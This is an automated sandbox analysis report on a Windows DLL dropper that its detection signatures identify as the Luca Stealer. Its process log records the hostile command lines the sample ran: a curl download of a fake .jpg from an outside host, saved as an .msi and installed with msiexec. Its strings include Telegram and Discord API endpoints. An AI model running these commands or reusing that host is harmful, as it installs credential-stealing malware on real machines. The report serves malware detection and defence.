Windows Analysis Report
SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll

Overview

General Information

Sample Name:	SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll
Analysis ID:	756307
MD5:	977f29431f9233f22f51b3d27e8abc28
SHA1:	7999931d13db79b25e8660065fbbe5288dc04d7e
SHA256:	b875add23dbf8b2942af53c0610c779c4263dacdf69186a3d4c9c09c3ebebdbe
Tags:	exe
Infos:

Detection

Luca Stealer

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Luca Stealer

Queries memory information (via WMI often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Creates files inside the system directory

PE file contains sections with non-standard names

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Found dropped PE file which has not been started or loaded

Drops PE files

Tries to load missing DLLs

Uses cacls to modify the permissions of files

Drops PE files to the windows directory (C:\Windows)

Checks for available system drives (often done to infect USB drives)

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\Logs\DPX\setupact.log			Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\Logs\DPX\setuperr.log			Jump to behavior

Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000025.00000003.305737619.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmp, expand.exe, 0000002D.00000003.365492953.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000035.00000003.418909523.0000000003231000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.458293973.00007FFC23C70000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: spclwow78x.msi.10.dr

Checks for available system drives (often done to infect USB drives)

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: c:
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: curl.exe, 0000000E.00000002.265327619.00000237F57C0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.265338006.00000237F57CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg
Source: cmd.exe, 00000005.00000002.258487106.000001E808BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.257861385.0000021271D60000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.265592954.000001E1230F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg-o%temp%
Source: curl.exe, 00000009.00000002.258205394.0000017782120000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.257455250.000001840CB40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.265327619.00000237F57C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://anydesk10.hospedagemdesites.ws/UIServices.jpg-oC:
Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://canonicalizer.ucsuri.tcs/680074007400700073003a002f002f00700069006e0067002e002e00630068006500
Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://canonicalizer.ucsuri.tcs/680074007400700073003a002f002f00700069006e0067002e002e006e0061007600
Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: http://ip-api.com/json/
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: http://ipwhois.app/json/
Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://api.telegram.org/bot
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/DDiscordBot
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/applications//commands/
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/channels/
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/gatewayhttps://discord.com/api/v10/gateway/bot
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/guilds/iconbannerjoined_atstring
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/guildshttps://discord.com/api/v10/invites/
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/interactions//callback
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/oauth2/applications/
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/stage-instanceshttps://discord.com/api/v10/stage-instances/
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/sticker-packshttps://discord.com/api/v10/users/
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/users/
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://discord.com/api/v10/voice/regionshttps://discord.com/api/v10/webhooks/
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-supportCalling
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://freegeoip.app/json/
Source: expand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://freegeoip.app/json/X
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://github.com/serenity-rs/serenity
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://ipapi.co//json/
Source: 0eae52cd25d2e54183e98bebd14ba490.tmp.37.dr	String found in binary or memory: https://status.discord.com/api/v2/incidents/unresolved.jsonhttps://status.discord.com/api/v2/schedul

Source: unknown

DNS traffic detected: queries for: anydesk10.hospedagemdesites.ws

Source: global traffic	HTTP traffic detected: GET /UIServices.jpg HTTP/1.1Host: anydesk10.hospedagemdesites.wsUser-Agent: curl/7.55.1Accept: /
Source: global traffic	HTTP traffic detected: GET /UIServices.jpg HTTP/1.1Host: anydesk10.hospedagemdesites.wsUser-Agent: curl/7.55.1Accept: /
Source: global traffic	HTTP traffic detected: GET /UIServices.jpg HTTP/1.1Host: anydesk10.hospedagemdesites.wsUser-Agent: curl/7.55.1Accept: /

Deletes files inside the Windows folder

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSIC14D.tmp

Jump to behavior

Creates files inside the system directory

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\3bbba0.msi

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe	Code function: 39_2_00007FFC235672A8		39_2_00007FFC235672A8
Source: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe	Code function: 47_2_00007FFC23C672A8		47_2_00007FFC23C672A8

Tries to load missing DLLs

Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll

Source: SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /C %temp%\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8954BF1BAC6ED414A355FBE261097B79
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\expand.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
